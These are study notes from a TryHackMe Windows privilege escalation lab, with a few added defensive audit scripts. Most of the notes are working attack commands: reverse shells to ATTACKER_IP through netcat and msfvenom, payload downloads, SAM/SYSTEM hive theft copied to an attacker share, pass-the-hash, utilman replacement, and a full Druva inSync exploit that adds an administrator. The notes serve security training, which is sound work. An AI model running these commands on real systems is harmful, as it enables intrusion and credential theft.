THM | Windows Privilege Escalation

Red Teaming | Windows Privilege Escalation | Description:

Notes taken while exploring the Windows Privilege Escalation room on the Red Teaming Path. The primary goal is to master the fundamentals of Windows privilege‑escalation techniques.


1 | Introduction

2 | Windows Privilege Escalation

Local Service vs. Network Service Accounts

Local Service Account
  • Key Characteristics: low-privilege built-in account; runs services with minimal local system access; cannot authenticate to remote network resources
  • Access Level: limited local access
  • Network Access: no network authentication
  • Use Case: services that only need local system resources and do not require network connectivity

Network Service Account
  • Key Characteristics: built-in Windows account; can access network resources; uses the computer's network credentials
  • Access Level: limited network access
  • Network Access: can authenticate to remote network resources using the computer account credentials
  • Use Case: services that need to interact with network resources but do not require specific user credentials

3 | Harvesting Passwords from Usual Spots

Unattended Windows Installations

  • if Windows Deployment Services was used for deployment (deploys a single OS image to multiple hosts)
  • requires an admin account to perform the install -> its credentials might be stored in:
    • C:\Unattend.xml
    • C:\Windows\Panther\Unattend.xml
    • C:\Windows\Panther\Unattend\Unattend.xml
    • C:\Windows\system32\sysprep.inf
    • C:\Windows\system32\sysprep\sysprep.xml

Powershell History

  • grab ps history with cmd
    type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
  • grab ps history with ps
    type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved Windows Credentials

  • windows allows us to use other users' credentials -> option to save creds on the system; list them with
    cmdkey /list
  • use the saved credentials to run programs
    runas /savecred /user:admin cmd.exe

IIS Configuration

  • Internet Information Services (IIS) default web server on Windows
  • config is stored in web.config
  • potential storage locations
    • C:\inetpub\wwwroot\web.config
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
  • grab the connection string
    type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Retrieve Credentials from Software: PuTTY

  • users can store session creds and config data
  • PuTTY does not store SSH passwords, but proxy configurations can contain cleartext authentication credentials
  • retrieve proxy creds
    reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

4 | Other Quick Wins

Scheduled Tasks

  • check on a scheduled task
    schtasks /query /tn vulntask /fo list /v
  • Task to Run parameter -> binary that gets executed
  • Run As User parameter -> the context under which the binary is executed
  • check permissions on the binary (F: Full Access)
    icacls c:\tasks\schtask.bat

Attack Example

  • find a scheduled task whose binary you have permission to modify (c:\tasks\schtask.bat | vulntask)
  • overwrite the binary to spawn a reverse shell
    echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
  • catch the reverse connection
    nc -lvp 4444
  • wait for the scheduled task to run (or trigger manually)
    schtasks /run /tn vulntask

AlwaysInstallElevated

  • IDEA: Windows installer files (also known as .msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts it. However, these can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow us to generate a malicious MSI file that would run with admin privileges.
  • Requires 2 registry values to be set:
    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
    :: and
    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Attack Example

  • if both registry values are set -> generate malicious .msi file
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi
  • run the metasploit handler module to catch the reverse shell
  • run the malicious binary once transferred over to the target system
    msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi
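An added audit script (not part of the room's material) that checks both registry values the notes above describe; the misconfiguration only exists when both HKLM and HKCU have AlwaysInstallElevated set to 1:

```powershell
# Added example (not from the TryHackMe room): audit the AlwaysInstallElevated policy.
# The weakness requires BOTH values to be 1; one hive alone is not enough.
function Test-AlwaysInstallElevated {
    $hives = @{
        HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }
    $values = @{}
    foreach ($hive in $hives.Keys) {
        $value = $null
        if (Test-Path -LiteralPath $hives[$hive]) {
            # the key may exist without the value; SilentlyContinue leaves $value as $null
            $value = (Get-ItemProperty -LiteralPath $hives[$hive] -Name 'AlwaysInstallElevated' `
                        -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        $values[$hive] = $value
    }
    [pscustomobject]@{
        HKLM       = $values['HKLM']
        HKCU       = $values['HKCU']
        Vulnerable = ($values['HKLM'] -eq 1) -and ($values['HKCU'] -eq 1)
    }
}

$status = Test-AlwaysInstallElevated
$status | Format-List
if ($status.Vulnerable) {
    Write-Warning 'AlwaysInstallElevated is enabled in both hives: any user can install an MSI as SYSTEM.'
    # Remediation (needs admin rights, or set the policy to Disabled via GPO):
    # Set-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated -Value 0
    # Set-ItemProperty -LiteralPath 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated -Value 0
}
```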

5 | Abusing Service Misconfigurations

Windows Services

  • check on a service and grab its configuration
    sc qc apphostsvc
  • BINARY_PATH_NAME parameter -> the associated executable
  • SERVICE_START_NAME parameter -> the account used to run the service
  • NOTE: Services have a Discretionary Access Control List (DACL), which indicates who has permission to start, stop, pause, query status, query configuration, or reconfigure the service, amongst other privileges
    • use Process Hacker to check on them
  • services configurations are stored under HKLM\SYSTEM\CurrentControlSet\Services\
  • in regedit: Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppHostSvc
    • ImagePath -> associated executable
    • ObjectName -> the account used to start the service
    • if DACL is configured for the service -> it will be stored in a subkey called Security

Insecure Permissions on Service Executable

  • IDEA: If the executable associated with a service has weak permissions that allow an attacker to modify or replace it, the attacker can gain the privileges of the service's account trivially

Attack Example

  • check the service configuration
    sc qc WindowsScheduler
  • check the permissions on the executable
    icacls C:\PROGRA~2\SYSTEM~1\WService.exe
  • generate the exe-service payload
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe
  • serve it up via python webserver
    python3 -m http.server
  • download the payload
    wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe
  • replace the service executable
    cd C:\PROGRA~2\SYSTEM~1\
    move WService.exe WService.exe.bkp
    move C:\Users\thm-unpriv\rev-svc.exe WService.exe
  • grant full permissions to the Everyone group
    icacls WService.exe /grant Everyone:F
  • start reverse shell on attack box
    nc -lvp 4445
  • wait for the service to restart (trigger it, or restart it manually)
    sc stop windowsscheduler
    sc start windowsscheduler
  • or if using PS (sc is an alias for Set-Content -> use sc.exe)
    sc.exe stop windowsscheduler
    sc.exe start windowsscheduler

Unquoted Service Paths

  • IDEA: Create any of the executables that are searched for before the expected service executable and force the service to run the arbitrary executable.
  • NOTE: Most service executables are installed under C:\Program Files or C:\Program Files (x86) -> these are NOT writable by unprivileged users by default

Attack Example

  • check permissions on the target directory
    icacls c:\MyPrograms
    :: AD and WD privileges -> can create subdirs and files
  • create exe-service payload and transfer it to the target
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe
  • start netcat listener
    nc -lvp 4446
  • once transferred, move it to any of the locations where hijacking might occur
    move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
  • grant Everyone full permissions on the file
    icacls C:\MyPrograms\Disk.exe /grant Everyone:F
  • wait for the service to restart (or trigger it manually)
    sc stop "disk sorter enterprise"
    sc start "disk sorter enterprise"
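An added audit script (not from the room) that enumerates the candidate hijack paths the notes above describe and reports whether their directories are writable; it generalises the single Disk Sorter case to every service on the host. The writability probe creates and deletes a temporary file, which is an assumption about what "writable" means here:

```powershell
# Added example (not from the TryHackMe room): audit for unquoted service paths and
# report whether the directories a hijack binary would have to live in are writable.
function Test-DirectoryWritable([string]$Dir) {
    # practical probe: try to create and delete a temporary file in the directory
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServicePath {
    $svcKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    foreach ($svc in Get-ChildItem $svcKey -ErrorAction SilentlyContinue) {
        $image = (Get-ItemProperty $svc.PSPath -ErrorAction SilentlyContinue).ImagePath
        if (-not $image) { continue }
        $image = [Environment]::ExpandEnvironmentVariables($image)
        # quoted paths are safe; otherwise the exe path is the leading text up to ".exe"
        if ($image.StartsWith('"')) { continue }
        if ($image -match '^(?<path>.*?\.exe)') { $path = $Matches.path } else { continue }
        if ($path -notmatch ' ') { continue }
        # CreateProcess tries the path truncated at each space: "C:\My Dir\a b.exe" is
        # looked up as C:\My.exe, then "C:\My Dir\a.exe", before the real binary
        $parts = $path -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $dir = Split-Path -Path $candidate -Parent
            if (-not (Test-Path -LiteralPath $dir)) { continue }
            [pscustomobject]@{
                Service   = $svc.PSChildName
                ImagePath = $image
                Candidate = $candidate
                Writable  = Test-DirectoryWritable $dir
            }
        }
    }
}

# Writable = True is the finding: fix it by quoting ImagePath or tightening the directory ACL
Get-UnquotedServicePath | Format-Table -AutoSize
```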

Insecure Service Permissions

  • IDEA: the service DACL (not the service's executable DACL) allows you to modify the config of a service -> allows you to point to ANY executable and run it with ANY account (including SYSTEM)

  • check for a service DACL (with Accesschk from the Sysinternals suite)

    :: it is installed to `C:\tools\AccessChk` and command is run from there
    accesschk64.exe -qlc thmservice
  • SERVICE_ALL_ACCESS permission for BUILTIN\Users -> any user can reconfigure the service

Attack Example

  • create the exe-service reverse shell and start the listener
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o rev-svc3.exe
    nc -lvp 4447
  • transfer the rev. shell executable over to the target
  • grant permission to Everyone
    icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
  • reconfigure the service: change the service's associated executable and account
    :: mind the spaces after the equal sign
    sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
  • run the service (can use any account to do it)
    sc stop THMService
    sc start THMService

6 | Abusing dangerous privileges

Windows Privileges

  • NOTE: Privileges are rights that an account has to perform specific system-related tasks. These tasks can be as simple as the privilege to shut down the machine up to privileges to bypass some DACL-based access controls.
  • complete list of privileges on Win systems
  • list of exploitable privileges
  • check on assigned privileges for the current user
    whoami /priv

SeBackup / SeRestore

  • allow users to read and write to any file in the system, ignoring any DACL in place

Attack Example - Copy SAM and SYSTEM registry hives

  • log in as a user that is part of the "Backup Operators" group, which holds the SeBackup and SeRestore privileges
  • open cmd as administrator -> will be prompted for password
  • check on our privileges
    whoami /priv
  • grab (back up) the SAM and SYSTEM hives, which contain the local password hashes
    reg save hklm\system C:\Users\THMBackup\system.hive
    reg save hklm\sam C:\Users\THMBackup\sam.hive
  • copy files over to the attack box (here over SMB)
  • create SMB share on attackbox
    mkdir share

    # share named public pointing to the share dir
    # requires the username and password of our current windows session
    python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
  • copy the files over (on targetbox)
    copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public\
    copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public\
  • retrieve the user pwd with impacket
    python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
    # example for Admin entry
    # Administrator:500:aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94:::
  • perform Pass-the-Hash with the Admin's hash
    python3.9 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@MACHINE_IP

SeTakeOwnership

  • allows a user to take ownership of any object on the system, including files and registry keys
  • IDEA: search for a service running as SYSTEM and take ownership of the service's executable
  • NOTE: being the owner of a file doesn't necessarily mean that you have privileges over it, but being the owner you can assign yourself any privileges you need

Attack Example - Abuse utilman.exe (Ease of Access option during lock screen)

  • log in with the user that has the SeTakeOwnership privilege
  • open a cmd as admin
  • check on your privileges
    whoami /priv
  • Utilman is run with SYSTEM privileges -> replace the original binary
  • take ownership of the binary
    takeown /f C:\Windows\System32\Utilman.exe
  • give your user full permissions over utilman.exe
    icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
  • replace utilman.exe with a copy of cmd.exe
    copy cmd.exe utilman.exe
  • trigger utilman -> lock the screen -> click on the "Ease of Access" button

SeImpersonate / SeAssignPrimaryToken

  • allow a process to impersonate other users and act on their behalf
  • usually consists of being able to spawn a process or thread under the security context of another user
  • IDEA: if we take control of a process with SeImpersonate or SeAssignPrimaryToken privileges, we can impersonate any user connecting and authenticating to that process
  • NOTE: LOCAL SERVICE and NETWORK SERVICE ACCOUNTS already have such privileges
    • IIS default account: iis apppool\defaultapppool

Attack Steps

  • spawn a process so that users can connect and authenticate to it for impersonation to occur
  • Find a way to force privileged users to connect and authenticate to the spawned malicious process

Attack Example - Use RogueWinRM to trigger the BITS service and impersonate its SYSTEM privilege

  • BACKGROUND-INFO:
    • The RogueWinRM exploit is possible because whenever a user (including unprivileged users) starts the BITS service in Windows, it automatically creates a connection to port 5985 using SYSTEM privileges. Port 5985 is typically used for the WinRM service, which is simply a port that exposes a Powershell console to be used remotely through the network.
    • If, for some reason, the WinRM service isn't running on the victim server, an attacker can start a fake WinRM service on port 5985 and catch the authentication attempt made by the BITS service when starting. If the attacker has SeImpersonate privileges, he can execute any command on behalf of the connecting user, which is SYSTEM.
  • upload RogueWinRM to the target box (here already done - in C:\tools\)
  • check on the assigned privileges
    whoami /priv
  • start netcat listener on attackbox
    nc -lvp 4442
  • trigger the RogueWinRM exploit
    :: -p: specify the executable; -a: arguments to pass to the executable
    c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe ATTACKER_IP 4442"
  • NOTE: The BITS service will stop automatically 2 minutes after starting

7 | Abusing vulnerable software

Unpatched Software

  • NOTE: the wmic product command may not return all installed programs (depending on how the programs were installed)
    • check desktop shortcuts, available services
  • use the wmic tool to list the software installed on the target system and their versions
    wmic product get name,version,vendor
  • search for existing exploits on the installed software

Attack Example - Druva inSync 6.6.3

  • multiple vulnerabilities

  • IDEA: The software is vulnerable because it runs an RPC (Remote Procedure Call) server on port 6064 with SYSTEM privileges, accessible from localhost only.

  • RPC-BACKGROUND: it is simply a mechanism that allows a given process to expose functions (called procedures in RPC lingo) over the network so that other machines can call them remotely

  • HERE: In the case of Druva inSync, one of the procedures exposed (specifically procedure number 5) on port 6064 allowed anyone to request the execution of any command. Since the RPC server runs as SYSTEM, any command gets executed with SYSTEM privileges.

    • patch only requires the command to start with C:\ProgramData\Druva\inSync4\
    • simple workaround: C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe
  • original exploit (PowerShell)

    $ErrorActionPreference = "Stop"

    # command that the RPC server will run as SYSTEM
    $cmd = "net user pwnd /add"

    # connect to the inSync RPC server listening on localhost:6064
    $s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
    )
    $s.Connect("127.0.0.1", 6064)

    # protocol header, followed by procedure number 5 as a 4-byte little-endian integer
    $header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
    $rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
    # command path uses ..\ to escape the allow-listed inSync4 prefix; encoded as UTF-16LE
    $command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
    # 4-byte little-endian length of the encoded command
    $length = [System.BitConverter]::GetBytes($command.Length);

    $s.Send($header)
    $s.Send($rpcType)
    $s.Send($length)
    $s.Send($command)
  • modify the executed command (via the $cmd variable) to create a user and add it to the local administrators group

    net user pwnd SimplePass123 /add & net localgroup administrators pwnd /add
  • once run, open an admin cmd as pwnd with your newly added user and its password
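An added example (not from the room or from Druva's code) of why the prefix-only patch described above was bypassable: a plain string prefix test accepts the ..\ path, while a check that canonicalises the path first rejects it. $allowedRoot mirrors the patch's prefix, the example.exe path is hypothetical, and the script assumes Windows PowerShell so that GetFullPath resolves backslash paths:

```powershell
# Added example (not from the TryHackMe room or Druva): string-prefix allow-list versus
# a check that canonicalises the path before comparing.
$allowedRoot = 'C:\ProgramData\Druva\inSync4\'

function Get-ExecutablePath([string]$Command) {
    # the executable is the leading token up to the first ".exe"; arguments follow it
    if ($Command -match '^(?<exe>.*?\.exe)') { return $Matches.exe }
    return $Command
}

# the patched check as described in the notes: a plain prefix comparison, bypassable with "..\"
function Test-CommandAllowedNaive([string]$Command) {
    return $Command.StartsWith($allowedRoot, [StringComparison]::OrdinalIgnoreCase)
}

# hardened form: resolve "." and ".." segments, then require the resolved executable
# to still sit under the allowed root (trailing backslash stops "inSync4evil\" matching)
function Test-CommandAllowedCanonical([string]$Command) {
    try {
        $exe  = [IO.Path]::GetFullPath((Get-ExecutablePath $Command))
        $root = [IO.Path]::GetFullPath($allowedRoot)
    } catch {
        return $false
    }
    return $exe.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)
}

$bypass = 'C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c whoami'
$inside = 'C:\ProgramData\Druva\inSync4\example.exe'   # hypothetical path under the root

"naive,     bypass : $(Test-CommandAllowedNaive $bypass)"
"canonical, bypass : $(Test-CommandAllowedCanonical $bypass)"
"canonical, inside : $(Test-CommandAllowedCanonical $inside)"
```

The naive check accepts the bypass string and the canonical check rejects it while still accepting the path inside the root; the resolved path must also be the one actually executed, otherwise the check can be raced.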

8 | Tools of the Trade

WinPEAS

  • available both as a precompiled executable or a .bat script
  • lengthy output -> redirect output to a file
    winpeas.exe > outputfile.txt

PrivescCheck

  • PS script
  • requires NO execution of a binary file
  • NOTE: you may need to bypass execution policy restrictions
    Set-ExecutionPolicy Bypass -Scope process -Force
  • load the module and run it
    . .\PrivescCheck.ps1
    Invoke-PrivescCheck

WES-NG

  • Windows Exploit Suggester - Next Generation
  • runs on the attacking machine
  • a python script
  • update the database - wes.py --update
  • requires you to run systeminfo on the target and transfer the output to the attackbox
  • run the check - wes.py systeminfo.txt

Metasploit

  • if you already have a Meterpreter shell on the target
  • use the multi/recon/local_exploit_suggester module to list vulnerabilities

9 | Conclusion